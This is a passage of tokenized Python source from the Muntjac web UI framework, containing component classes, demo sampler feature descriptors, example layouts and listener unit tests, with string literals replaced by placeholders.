, event ) : <EOL> self . fireEvent ( ColorChangeEvent ( self , event . getColor ( ) ) ) </s>
<s> from muntjac . ui . abstract_component import AbstractComponent <EOL> from muntjac . addon . refresher . ui . v_refresher import VRefresher <EOL> class Refresher ( AbstractComponent ) : <EOL> """<STR_LIT>""" <EOL> CLIENT_WIDGET = None <EOL> TYPE_MAPPING = '<STR_LIT>' <EOL> _DEFAULT_REFRESH_INTERVAL = <NUM_LIT:1000> <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( Refresher , self ) . __init__ ( ) <EOL> self . _refreshListeners = list ( ) <EOL> self . _refreshIntervalInMillis = self . _DEFAULT_REFRESH_INTERVAL <EOL> def paintContent ( self , target ) : <EOL> target . addAttribute ( '<STR_LIT>' , self . _refreshIntervalInMillis ) <EOL> def setRefreshInterval ( self , intervalInMillis ) : <EOL> """<STR_LIT>""" <EOL> self . _refreshIntervalInMillis = intervalInMillis <EOL> self . requestRepaint ( ) <EOL> def getRefreshInterval ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _refreshIntervalInMillis <EOL> def changeVariables ( self , source , variables ) : <EOL> super ( Refresher , self ) . changeVariables ( source , variables ) <EOL> if VRefresher . VARIABLE_REFRESH_EVENT in variables : <EOL> self . fireRefreshEvents ( ) <EOL> def fireRefreshEvents ( self ) : <EOL> for listener in self . _refreshListeners : <EOL> listener . refresh ( self ) <EOL> def addListener ( self , listener , iface = None ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( listener , RefreshListener ) : <EOL> self . _refreshListeners . append ( listener ) <EOL> else : <EOL> super ( Refresher , self ) . addListener ( listener , iface ) <EOL> def removeListener ( self , listener , iface = None ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( listener , RefreshListener ) : <EOL> self . _refreshListeners . remove ( listener ) <EOL> else : <EOL> super ( Refresher , self ) . removeListener ( listener , iface ) <EOL> class RefreshListener ( object ) : <EOL> def refresh ( self , source ) : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> class ListSet ( list ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args ) : <EOL> self . _itemSet = None <EOL> self . _duplicates = dict ( ) <EOL> nargs = len ( args ) <EOL> if nargs == <NUM_LIT:0> : <EOL> super ( ListSet , self ) . __init__ ( ) <EOL> self . _itemSet = set ( ) <EOL> elif nargs == <NUM_LIT:1> : <EOL> if isinstance ( args [ <NUM_LIT:0> ] , int ) : <EOL> initialCapacity , = args <EOL> super ( ListSet , self ) . __init__ ( ) <EOL> self . _itemSet = set ( ) <EOL> else : <EOL> c , = args <EOL> super ( ListSet , self ) . __init__ ( c ) <EOL> self . _itemSet = set ( ) <EOL> self . _itemSet = self . _itemSet . union ( c ) <EOL> else : <EOL> raise ValueError , '<STR_LIT>' <EOL> def contains ( self , o ) : <EOL> return o in self . _itemSet <EOL> def __contains__ ( self , item ) : <EOL> return self . contains ( item ) <EOL> def containsAll ( self , c ) : <EOL> for cc in c : <EOL> if cc not in self . _itemSet : <EOL> return False <EOL> else : <EOL> return True <EOL> def append ( self , val ) : <EOL> return self . add ( val ) <EOL> def insert ( self , idx , val ) : <EOL> return self . add ( idx , val ) <EOL> def add ( self , * args ) : <EOL> """<STR_LIT>""" <EOL> nargs = len ( args ) <EOL> if nargs == <NUM_LIT:1> : <EOL> e , = args <EOL> if self . contains ( e ) : <EOL> return False <EOL> if not super ( ListSet , self ) . __contains__ ( e ) : <EOL> super ( ListSet , self ) . append ( e ) <EOL> self . _itemSet . add ( e ) <EOL> return True <EOL> else : <EOL> return False <EOL> elif nargs == <NUM_LIT:2> : <EOL> index , element = args <EOL> if self . contains ( element ) : <EOL> return <EOL> super ( ListSet , self ) . insert ( index , element ) <EOL> self . _itemSet . add ( element ) <EOL> else : <EOL> raise ValueError , '<STR_LIT>' <EOL> def extend ( self , iterable ) : <EOL> return self . addAll ( iterable ) <EOL> def addAll ( self , * args ) : <EOL> nargs = len ( args ) <EOL> if nargs == <NUM_LIT:1> : <EOL> c , = args <EOL> modified = False <EOL> for e in c : <EOL> if self . contains ( e ) : <EOL> continue <EOL> if self . add ( e ) : <EOL> self . _itemSet . add ( e ) <EOL> modified = True <EOL> return modified <EOL> elif nargs == <NUM_LIT:2> : <EOL> index , c = args <EOL> modified = False <EOL> for e in c : <EOL> if self . contains ( e ) : <EOL> continue <EOL> self . add ( index , e ) <EOL> index += <NUM_LIT:1> <EOL> self . _itemSet . add ( e ) <EOL> modified = True <EOL> return modified <EOL> else : <EOL> raise ValueError , '<STR_LIT>' <EOL> def clear ( self ) : <EOL> del self [ : ] <EOL> self . _itemSet . clear ( ) <EOL> def index ( self , val ) : <EOL> return self . indexOf ( val ) <EOL> def indexOf ( self , o ) : <EOL> if not self . contains ( o ) : <EOL> return - <NUM_LIT:1> <EOL> return super ( ListSet , self ) . index ( o ) <EOL> def lastIndexOf ( self , o ) : <EOL> if not self . contains ( o ) : <EOL> return - <NUM_LIT:1> <EOL> return self [ : : - <NUM_LIT:1> ] . index ( o ) <EOL> def remove ( self , o ) : <EOL> if isinstance ( o , int ) : <EOL> index = o <EOL> e = super ( ListSet , self ) . pop ( index ) <EOL> if e is not None : <EOL> self . _itemSet . remove ( e ) <EOL> return e <EOL> else : <EOL> if super ( ListSet , self ) . remove ( o ) : <EOL> self . _itemSet . remove ( o ) <EOL> return True <EOL> else : <EOL> return False <EOL> def removeRange ( self , fromIndex , toIndex ) : <EOL> toRemove = set ( ) <EOL> for idx in range ( fromIndex , toIndex ) : <EOL> toRemove . add ( self [ idx ] ) <EOL> del self [ fromIndex : toIndex ] <EOL> for r in toRemove : <EOL> self . _itemSet . remove ( r ) <EOL> def set ( self , index , element ) : <EOL> if element in self : <EOL> if self [ index ] == element : <EOL> return element <EOL> else : <EOL> self . addDuplicate ( element ) <EOL> old = self [ index ] = element <EOL> self . removeFromSet ( old ) <EOL> self . _itemSet . add ( element ) <EOL> return old <EOL> def removeFromSet ( self , e ) : <EOL> """<STR_LIT>""" <EOL> dupl = self . _duplicates . get ( e ) <EOL> if dupl is not None : <EOL> if dupl == <NUM_LIT:1> : <EOL> del self . _duplicates [ e ] <EOL> else : <EOL> self . _duplicates [ e ] = dupl - <NUM_LIT:1> <EOL> else : <EOL> self . _itemSet . remove ( e ) <EOL> def addDuplicate ( self , element ) : <EOL> """<STR_LIT>""" <EOL> nr = self . _duplicates . get ( element ) <EOL> if nr is None : <EOL> nr = <NUM_LIT:1> <EOL> else : <EOL> nr += <NUM_LIT:1> <EOL> self . _duplicates [ element ] = nr <EOL> def clone ( self ) : <EOL> v = ListSet ( self [ : ] ) <EOL> v . _itemSet = set ( self . _itemSet ) <EOL> return v </s>
<s> import inspect <EOL> from muntjac . util import fullname <EOL> from muntjac . util import loadClass <EOL> from muntjac . terminal . gwt . server . abstract_application_servlet import AbstractApplicationServlet <EOL> class Feature ( object ) : <EOL> """<STR_LIT>""" <EOL> PROPERTY_ICON = '<STR_LIT>' <EOL> PROPERTY_NAME = '<STR_LIT:Name>' <EOL> PROPERTY_DESCRIPTION = '<STR_LIT>' <EOL> _MSG_SOURCE_NOT_AVAILABLE = ( '<STR_LIT>' <EOL> + '<STR_LIT>' <EOL> + '<STR_LIT>' <EOL> + '<STR_LIT>' ) <EOL> _MUTEX = object ( ) <EOL> def __init__ ( self ) : <EOL> self . _pythonSource = None <EOL> def getName ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def getDescription ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def getRelatedResources ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def getRelatedAPI ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def getRelatedFeatures ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def getIconName ( self ) : <EOL> """<STR_LIT>""" <EOL> icon = self . __class__ . __name__ + '<STR_LIT>' <EOL> return icon <EOL> def getExample ( self ) : <EOL> """<STR_LIT>""" <EOL> pkgName , className = fullname ( self ) . rsplit ( '<STR_LIT:.>' , <NUM_LIT:1> ) <EOL> canonicalName = pkgName + '<STR_LIT>' + '<STR_LIT:.>' + className + '<STR_LIT>' <EOL> classObject = loadClass ( canonicalName ) <EOL> return classObject ( ) <EOL> def getSource ( self ) : <EOL> if self . _pythonSource is None : <EOL> try : <EOL> ex = self . getExample ( ) <EOL> self . _pythonSource = inspect . getsource ( inspect . getmodule ( ex ) ) <EOL> except IOError : <EOL> print ( self . _MSG_SOURCE_NOT_AVAILABLE <EOL> + '<STR_LIT>' + self . getFragmentName ( ) + '<STR_LIT:)>' ) <EOL> self . _pythonSource = self . _MSG_SOURCE_NOT_AVAILABLE <EOL> return self . _pythonSource <EOL> def getSourceHTML ( self ) : <EOL> return self . getSource ( ) <EOL> def getFragmentName ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __class__ . __name__ <EOL> def getSinceVersion ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> @ classmethod <EOL> def getThemeBase ( cls ) : <EOL> """<STR_LIT>""" <EOL> from muntjac . demo . sampler . SamplerApplication import SamplerApplication <EOL> return SamplerApplication . getThemeBase ( ) <EOL> def __str__ ( self ) : <EOL> return self . getName ( ) <EOL> def __eq__ ( self , obj ) : <EOL> if obj is None : <EOL> return False <EOL> return obj . __class__ == self . __class__ <EOL> def hashCode ( self ) : <EOL> return hash ( self . __class__ ) <EOL> def __hash__ ( self ) : <EOL> return self . hashCode ( ) <EOL> class Version ( object ) : <EOL> OLD = None <EOL> BUILD = None <EOL> V62 = None <EOL> V63 = None <EOL> V64 = None <EOL> V65 = None <EOL> V66 = None <EOL> def __init__ ( self , version ) : <EOL> self . version = version <EOL> def isNew ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . BUILD . version <= self . version <EOL> _enum_values = [ OLD , BUILD , V62 , V63 , V64 , V65 , V66 ] <EOL> @ classmethod <EOL> def values ( cls ) : <EOL> return cls . _enum_values [ : ] <EOL> Version . OLD = Version ( <NUM_LIT:0> ) <EOL> Version . BUILD = Version ( int ( '<STR_LIT>' % ( AbstractApplicationServlet . VERSION_MAJOR , <EOL> AbstractApplicationServlet . VERSION_MINOR ) ) ) <EOL> Version . V62 = Version ( <NUM_LIT> ) <EOL> Version . V63 = Version ( <NUM_LIT> ) <EOL> Version . V64 = Version ( <NUM_LIT:64> ) <EOL> Version . V65 = Version ( <NUM_LIT> ) <EOL> Version . V66 = Version ( <NUM_LIT> ) </s>
<s> import time <EOL> import threading <EOL> from time import gmtime , strftime <EOL> from muntjac . api import Button , VerticalLayout , Label , TextArea <EOL> from muntjac . terminal . theme_resource import ThemeResource <EOL> from muntjac . ui . button import IClickListener <EOL> class JSApiExample ( VerticalLayout ) : <EOL> def __init__ ( self ) : <EOL> super ( JSApiExample , self ) . __init__ ( ) <EOL> self . _toBeUpdatedFromThread = None <EOL> self . _startThread = None <EOL> self . _running = Label ( '<STR_LIT>' ) <EOL> self . setSpacing ( True ) <EOL> javascript = Label ( "<STR_LIT>" , <EOL> Label . CONTENT_XHTML ) <EOL> self . addComponent ( javascript ) <EOL> script = TextArea ( ) <EOL> script . setWidth ( '<STR_LIT>' ) <EOL> script . setRows ( <NUM_LIT:3> ) <EOL> script . setValue ( '<STR_LIT>' ) <EOL> self . addComponent ( script ) <EOL> self . addComponent ( Button ( '<STR_LIT>' , RunListener ( self , script ) ) ) <EOL> class RunListener ( IClickListener ) : <EOL> def __init__ ( self , component , script ) : <EOL> self . _component = component <EOL> self . _script = script <EOL> def buttonClick ( self , event ) : <EOL> self . _component . getWindow ( ) . executeJavaScript ( <EOL> str ( self . _script . getValue ( ) ) ) <EOL> class StartListener ( IClickListener ) : <EOL> def __init__ ( self , component ) : <EOL> self . _component = component <EOL> def buttonClick ( self , event ) : <EOL> self . _component . _startThread . getParent ( ) . replaceComponent ( <EOL> self . _component . _startThread , <EOL> self . _component . _running ) <EOL> BackgroundProcess ( self . _component ) . start ( ) <EOL> class BackgroundProcess ( threading . Thread ) : <EOL> def __init__ ( self , component ) : <EOL> super ( BackgroundProcess , self ) . __init__ ( ) <EOL> self . _component = component <EOL> def run ( self ) : <EOL> try : <EOL> i = <NUM_LIT:0> <EOL> while i < <NUM_LIT:10> : <EOL> time . sleep ( <NUM_LIT:1000> ) <EOL> self . _component . _toBeUpdatedFromThread . setValue ( <EOL> '<STR_LIT>' <EOL> + strftime ( "<STR_LIT>" , gmtime ( ) ) <EOL> + '<STR_LIT>' ) <EOL> i += <NUM_LIT:1> <EOL> self . _component . _toBeUpdatedFromThread . setValue ( <EOL> '<STR_LIT>' ) <EOL> self . _component . _running . getParent ( ) . replaceComponent ( <EOL> self . _component . _running , self . _component . _startThread ) <EOL> except self . InterruptedException , e : <EOL> e . printStackTrace ( ) </s>
<s> from muntjac . demo . sampler . features . dragndrop . DragDropHtml5FromDesktop import DragDropHtml5FromDesktop <EOL> from muntjac . demo . sampler . features . dragndrop . DragDropTableTree import DragDropTableTree <EOL> from muntjac . demo . sampler . features . dragndrop . DragDropServerValidation import DragDropServerValidation <EOL> from muntjac . ui . tree import Tree <EOL> from muntjac . event . dd . drop_handler import IDropHandler <EOL> from muntjac . demo . sampler . features . dragndrop . DragDropRearrangeComponents import DragDropRearrangeComponents <EOL> from muntjac . demo . sampler . APIResource import APIResource <EOL> from muntjac . demo . sampler . Feature import Feature , Version <EOL> class DragDropTreeSorting ( Feature ) : <EOL> def getSinceVersion ( self ) : <EOL> return Version . V63 <EOL> def getName ( self ) : <EOL> return '<STR_LIT>' <EOL> def getDescription ( self ) : <EOL> return ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def getRelatedAPI ( self ) : <EOL> return [ APIResource ( Tree ) , APIResource ( IDropHandler ) ] <EOL> def getRelatedFeatures ( self ) : <EOL> return [ <EOL> DragDropTableTree , <EOL> DragDropServerValidation , <EOL> DragDropRearrangeComponents , <EOL> DragDropHtml5FromDesktop <EOL> ] <EOL> def getRelatedResources ( self ) : <EOL> return None </s>
<s> from muntjac . demo . sampler . APIResource import APIResource <EOL> from muntjac . demo . sampler . Feature import Feature , Version <EOL> from muntjac . api import HorizontalLayout <EOL> class ExpandingComponent ( Feature ) : <EOL> def getSinceVersion ( self ) : <EOL> return Version . OLD <EOL> def getName ( self ) : <EOL> return '<STR_LIT>' <EOL> def getDescription ( self ) : <EOL> return ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def getRelatedAPI ( self ) : <EOL> return [ APIResource ( HorizontalLayout ) ] <EOL> def getRelatedFeatures ( self ) : <EOL> return [ ] <EOL> def getRelatedResources ( self ) : <EOL> return None </s>
<s> from muntjac . demo . sampler . APIResource import APIResource <EOL> from muntjac . demo . sampler . Feature import Feature , Version <EOL> from muntjac . ui . menu_bar import MenuBar <EOL> class BasicMenuBar ( Feature ) : <EOL> def getSinceVersion ( self ) : <EOL> return Version . V62 <EOL> def getName ( self ) : <EOL> return '<STR_LIT>' <EOL> def getDescription ( self ) : <EOL> return ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def getRelatedAPI ( self ) : <EOL> return [ APIResource ( MenuBar ) ] <EOL> def getRelatedFeatures ( self ) : <EOL> from muntjac . demo . sampler . features . menubar . MenuBarTooltips import MenuBarTooltips <EOL> from muntjac . demo . sampler . features . menubar . MenuBarHiddenItems import MenuBarHiddenItems <EOL> from muntjac . demo . sampler . features . menubar . MenuBarWithIcons import MenuBarWithIcons <EOL> from muntjac . demo . sampler . features . menubar . MenuBarItemStyles import MenuBarItemStyles <EOL> from muntjac . demo . sampler . features . menubar . MenuBarCollapsing import MenuBarCollapsing <EOL> return [ <EOL> MenuBarWithIcons , <EOL> MenuBarCollapsing , <EOL> MenuBarHiddenItems , <EOL> MenuBarItemStyles , <EOL> MenuBarTooltips <EOL> ] <EOL> def getRelatedResources ( self ) : <EOL> return None </s>
<s> from muntjac . api import VerticalLayout , Panel , Label , Button <EOL> from muntjac . ui . button import IClickListener <EOL> class PanelBasicExample ( VerticalLayout , IClickListener ) : <EOL> def __init__ ( self ) : <EOL> super ( PanelBasicExample , self ) . __init__ ( ) <EOL> self . setSpacing ( True ) <EOL> self . _panel = Panel ( '<STR_LIT>' ) <EOL> self . _panel . setHeight ( '<STR_LIT>' ) <EOL> layout = self . _panel . getContent ( ) <EOL> layout . setMargin ( True ) <EOL> layout . setSpacing ( True ) <EOL> self . addComponent ( self . _panel ) <EOL> for _ in range ( <NUM_LIT:20> ) : <EOL> l = Label ( '<STR_LIT>' ) <EOL> self . _panel . addComponent ( l ) <EOL> b = Button ( '<STR_LIT>' ) <EOL> b . addListener ( self , IClickListener ) <EOL> self . addComponent ( b ) <EOL> def buttonClick ( self , event ) : <EOL> if self . _panel . getCaption ( ) == '<STR_LIT>' : <EOL> self . _panel . setCaption ( '<STR_LIT>' ) <EOL> else : <EOL> self . _panel . setCaption ( '<STR_LIT>' ) </s>
<s> from muntjac . demo . sampler . features . selects . TwinColumnSelect import TwinColumnSelect <EOL> from muntjac . demo . sampler . features . selects . OptionGroups import OptionGroups <EOL> from muntjac . demo . sampler . features . selects . NativeSelection import NativeSelection <EOL> from muntjac . demo . sampler . features . selects . ListSelectMultiple import ListSelectMultiple <EOL> from muntjac . demo . sampler . APIResource import APIResource <EOL> from muntjac . demo . sampler . Feature import Feature , Version <EOL> from muntjac . ui . option_group import OptionGroup <EOL> class OptionGroupDisabledItems ( Feature ) : <EOL> def getSinceVersion ( self ) : <EOL> return Version . V64 <EOL> def getName ( self ) : <EOL> return '<STR_LIT>' <EOL> def getDescription ( self ) : <EOL> return ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def getRelatedAPI ( self ) : <EOL> return [ APIResource ( OptionGroup ) ] <EOL> def getRelatedFeatures ( self ) : <EOL> return [ <EOL> OptionGroups , <EOL> NativeSelection , <EOL> ListSelectMultiple , <EOL> TwinColumnSelect <EOL> ] <EOL> def getRelatedResources ( self ) : <EOL> return None </s>
<s> from muntjac . ui . table import Table <EOL> from muntjac . demo . sampler . features . table . TableMainFeaturesExample import TableMainFeaturesExample <EOL> from muntjac . demo . sampler . APIResource import APIResource <EOL> from muntjac . demo . sampler . Feature import Feature , Version <EOL> class TableHeaderIcons ( Feature ) : <EOL> def getSinceVersion ( self ) : <EOL> return Version . OLD <EOL> def getName ( self ) : <EOL> return '<STR_LIT>' <EOL> def getExample ( self ) : <EOL> return TableMainFeaturesExample ( ) <EOL> def getDescription ( self ) : <EOL> return ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def getRelatedAPI ( self ) : <EOL> return [ APIResource ( Table ) ] <EOL> def getRelatedFeatures ( self ) : <EOL> from muntjac . demo . sampler . FeatureSet import Tables <EOL> return [ Tables ] <EOL> def getRelatedResources ( self ) : <EOL> return None </s>
<s> from muntjac . api import HorizontalLayout , Button , Label , TextArea <EOL> from muntjac . data . property import IValueChangeListener <EOL> class TextAreaExample ( HorizontalLayout , IValueChangeListener ) : <EOL> _initialText = '<STR_LIT>' <EOL> def __init__ ( self ) : <EOL> super ( TextAreaExample , self ) . __init__ ( ) <EOL> self . setSpacing ( True ) <EOL> self . setWidth ( '<STR_LIT>' ) <EOL> self . _editor = TextArea ( None , self . _initialText ) <EOL> self . _editor . setRows ( <NUM_LIT:20> ) <EOL> self . _editor . setColumns ( <NUM_LIT:20> ) <EOL> self . _editor . addListener ( self , IValueChangeListener ) <EOL> self . _editor . setImmediate ( True ) <EOL> self . addComponent ( self . _editor ) <EOL> self . addComponent ( Button ( '<STR_LIT:>>' ) ) <EOL> self . _plainText = Label ( self . _initialText ) <EOL> self . _plainText . setContentMode ( Label . CONTENT_XHTML ) <EOL> self . addComponent ( self . _plainText ) <EOL> self . setExpandRatio ( self . _plainText , <NUM_LIT:1> ) <EOL> def valueChange ( self , event ) : <EOL> text = self . _editor . getValue ( ) <EOL> if text is not None : <EOL> text = text . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) <EOL> self . _plainText . setValue ( text ) </s>
<s> from muntjac . ui . window import Window <EOL> from muntjac . demo . sampler . APIResource import APIResource <EOL> from muntjac . demo . sampler . Feature import Feature , Version <EOL> class SubwindowAutoSized ( Feature ) : <EOL> def getSinceVersion ( self ) : <EOL> return Version . OLD <EOL> def getName ( self ) : <EOL> return '<STR_LIT>' <EOL> def getDescription ( self ) : <EOL> return ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def getRelatedAPI ( self ) : <EOL> return [ APIResource ( Window ) ] <EOL> def getRelatedFeatures ( self ) : <EOL> from muntjac . demo . sampler . FeatureSet import Windows <EOL> from muntjac . demo . sampler . features . windows . SubwindowSized import SubwindowSized <EOL> return [ SubwindowSized , Windows ] <EOL> def getRelatedResources ( self ) : <EOL> return None </s>
<s> """<STR_LIT>""" <EOL> from muntjac . event . dd . acceptcriteria . accept_criterion import IAcceptCriterion <EOL> class ServerSideCriterion ( IAcceptCriterion ) : <EOL> """<STR_LIT>""" <EOL> def isClientSideVerifiable ( self ) : <EOL> return False <EOL> def paint ( self , target ) : <EOL> target . startTag ( '<STR_LIT>' ) <EOL> target . addAttribute ( '<STR_LIT:name>' , self . getIdentifier ( ) ) <EOL> self . paintContent ( target ) <EOL> target . endTag ( '<STR_LIT>' ) <EOL> def paintContent ( self , target ) : <EOL> pass <EOL> def paintResponse ( self , target ) : <EOL> pass <EOL> def getIdentifier ( self ) : <EOL> return '<STR_LIT>' </s>
<s> from muntjac . service . file_type_resolver import FileTypeResolver <EOL> from muntjac . terminal . application_resource import IApplicationResource <EOL> from muntjac . terminal . download_stream import DownloadStream <EOL> class ClassResource ( IApplicationResource ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args ) : <EOL> """<STR_LIT>""" <EOL> self . _bufferSize = <NUM_LIT:0> <EOL> self . _cacheTime = self . DEFAULT_CACHETIME <EOL> self . _associatedClass = None <EOL> self . _resourceName = None <EOL> self . _application = None <EOL> nargs = len ( args ) <EOL> if nargs == <NUM_LIT:2> : <EOL> resourceName , application = args <EOL> self . _associatedClass = application . __class__ <EOL> self . _resourceName = resourceName <EOL> self . _application = application <EOL> if resourceName is None : <EOL> raise ValueError <EOL> application . addResource ( self ) <EOL> elif nargs == <NUM_LIT:3> : <EOL> associatedClass , resourceName , application = args <EOL> self . _associatedClass = associatedClass <EOL> self . _resourceName = resourceName <EOL> self . _application = application <EOL> if ( resourceName is None ) or ( associatedClass is None ) : <EOL> raise ValueError <EOL> application . addResource ( self ) <EOL> else : <EOL> raise ValueError , '<STR_LIT>' <EOL> def getMIMEType ( self ) : <EOL> """<STR_LIT>""" <EOL> return FileTypeResolver . getMIMEType ( self . _resourceName ) <EOL> def getApplication ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _application <EOL> def getFilename ( self ) : <EOL> """<STR_LIT>""" <EOL> index = <NUM_LIT:0> <EOL> idx = self . _resourceName . find ( '<STR_LIT:/>' , index ) <EOL> while idx > <NUM_LIT:0> and idx + <NUM_LIT:1> < len ( self . _resourceName ) : <EOL> index = idx + <NUM_LIT:1> <EOL> idx = self . _resourceName . find ( '<STR_LIT:/>' , index ) <EOL> return self . _resourceName [ index : ] <EOL> def getStream ( self ) : <EOL> """<STR_LIT>""" <EOL> ds = DownloadStream ( <EOL> self . _associatedClass . getResourceAsStream ( self . _resourceName ) , <EOL> self . getMIMEType ( ) , self . getFilename ( ) ) <EOL> ds . setBufferSize ( self . getBufferSize ( ) ) <EOL> ds . setCacheTime ( self . _cacheTime ) <EOL> return ds <EOL> def getBufferSize ( self ) : <EOL> return self . _bufferSize <EOL> def setBufferSize ( self , bufferSize ) : <EOL> """<STR_LIT>""" <EOL> self . _bufferSize = bufferSize <EOL> def getCacheTime ( self ) : <EOL> return self . _cacheTime <EOL> def setCacheTime ( self , cacheTime ) : <EOL> """<STR_LIT>""" <EOL> self . _cacheTime = cacheTime </s>
<s> class VVideo ( object ) : <EOL> ATTR_POSTER = "<STR_LIT>" </s>
<s> class IResource ( object ) : <EOL> """<STR_LIT>""" <EOL> def getMIMEType ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError </s>
<s> from muntjac . test . server . component . abstract_listener_methods_test import AbstractListenerMethodsTest <EOL> from muntjac . ui . embedded import Embedded <EOL> from muntjac . event . mouse_events import ClickEvent , IClickListener <EOL> class EmbeddedListeners ( AbstractListenerMethodsTest ) : <EOL> def testClickListenerAddGetRemove ( self ) : <EOL> self . _testListenerAddGetRemove ( Embedded , ClickEvent , IClickListener ) </s>
<s> from unittest import TestCase <EOL> from muntjac . ui . label import Label <EOL> from muntjac . ui . horizontal_layout import HorizontalLayout <EOL> from muntjac . ui . grid_layout import GridLayout <EOL> from muntjac . ui . absolute_layout import AbsoluteLayout <EOL> from muntjac . ui . css_layout import CssLayout <EOL> from muntjac . ui . abstract_ordered_layout import AbstractOrderedLayout <EOL> from muntjac . ui . component_container import IComponentAttachListener , IComponentDetachListener <EOL> class ComponentAttachDetachListenerTest ( TestCase ) : <EOL> def resetVariables ( self ) : <EOL> self . _attachCounter = <NUM_LIT:0> <EOL> self . _attachedComponent = None <EOL> self . _attachTarget = None <EOL> self . _foundInContainer = False <EOL> self . _detachCounter = <NUM_LIT:0> <EOL> self . _detachedComponent = None <EOL> self . _detachedTarget = None <EOL> self . _indexOfComponent = - <NUM_LIT:1> <EOL> self . _componentArea = None <EOL> self . _componentPosition = None <EOL> def setUp ( self ) : <EOL> super ( ComponentAttachDetachListenerTest , self ) . setUp ( ) <EOL> self . _attachCounter = <NUM_LIT:0> <EOL> self . _attachedComponent = None <EOL> self . _attachTarget = None <EOL> self . _foundInContainer = False <EOL> self . _detachCounter = <NUM_LIT:0> <EOL> self . _detachedComponent = None <EOL> self . _detachedTarget = None <EOL> self . _indexOfComponent = - <NUM_LIT:1> <EOL> self . _componentArea = None <EOL> self . _componentPosition = None <EOL> self . _olayout = HorizontalLayout ( ) <EOL> listener = MyAttachListener ( self ) <EOL> self . _olayout . addListener ( listener , IComponentAttachListener ) <EOL> listener = MyDetachListener ( self ) <EOL> self . _olayout . addListener ( listener , IComponentDetachListener ) <EOL> self . _gridlayout = GridLayout ( ) <EOL> listener = MyAttachListener ( self ) <EOL> self . _gridlayout . addListener ( listener , IComponentAttachListener ) <EOL> listener = MyDetachListener ( self ) <EOL> self . _gridlayout . addListener ( listener , IComponentDetachListener ) <EOL> self . _absolutelayout = AbsoluteLayout ( ) <EOL> listener = MyAttachListener ( self ) <EOL> self . _absolutelayout . addListener ( listener , IComponentAttachListener ) <EOL> listener = MyDetachListener ( self ) <EOL> self . _absolutelayout . addListener ( listener , IComponentDetachListener ) <EOL> self . _csslayout = CssLayout ( ) <EOL> listener = MyAttachListener ( self ) <EOL> self . _csslayout . addListener ( listener , IComponentAttachListener ) <EOL> listener = MyDetachListener ( self ) <EOL> self . _csslayout . addListener ( listener , IComponentDetachListener ) <EOL> def testOrderedLayoutAttachListener ( self ) : <EOL> self . resetVariables ( ) <EOL> comp = Label ( ) <EOL> self . _olayout . addComponent ( comp ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _attachCounter ) <EOL> self . assertEquals ( comp , self . _attachedComponent ) <EOL> self . assertEquals ( self . _olayout , self . _attachTarget ) <EOL> self . assertTrue ( self . _foundInContainer ) <EOL> self . assertFalse ( self . _indexOfComponent == - <NUM_LIT:1> ) <EOL> def testOrderedLayoutDetachListener ( self ) : <EOL> comp = Label ( ) <EOL> self . _olayout . addComponent ( comp ) <EOL> self . resetVariables ( ) <EOL> self . _olayout . removeComponent ( comp ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _detachCounter ) <EOL> self . assertEquals ( comp , self . _detachedComponent ) <EOL> self . assertEquals ( self . _olayout , self . _detachedTarget ) <EOL> self . assertFalse ( self . _foundInContainer ) <EOL> self . assertEquals ( - <NUM_LIT:1> , self . _indexOfComponent ) <EOL> def testGridLayoutAttachListener ( self ) : <EOL> self . resetVariables ( ) <EOL> comp = Label ( ) <EOL> self . _gridlayout . addComponent ( comp ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _attachCounter ) <EOL> self . assertEquals ( comp , self . _attachedComponent ) <EOL> self . assertEquals ( self . _gridlayout , self . _attachTarget ) <EOL> self . assertTrue ( self . _foundInContainer ) <EOL> self . assertIsNotNone ( self . _componentArea ) <EOL> def testGridLayoutDetachListener ( self ) : <EOL> comp = Label ( ) <EOL> self . _gridlayout . addComponent ( comp ) <EOL> self . resetVariables ( ) <EOL> self . _gridlayout . removeComponent ( comp ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _detachCounter ) <EOL> self . assertEquals ( comp , self . _detachedComponent ) <EOL> self . assertEquals ( self . _gridlayout , self . _detachedTarget ) <EOL> self . assertFalse ( self . _foundInContainer ) <EOL> self . assertIsNone ( self . _componentArea ) <EOL> def testAbsoluteLayoutAttachListener ( self ) : <EOL> self . resetVariables ( ) <EOL> comp = Label ( ) <EOL> self . _absolutelayout . addComponent ( comp ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _attachCounter ) <EOL> self . assertEquals ( comp , self . _attachedComponent ) <EOL> self . assertEquals ( self . _absolutelayout , self . _attachTarget ) <EOL> self . assertTrue ( self . _foundInContainer ) <EOL> self . assertIsNotNone ( self . 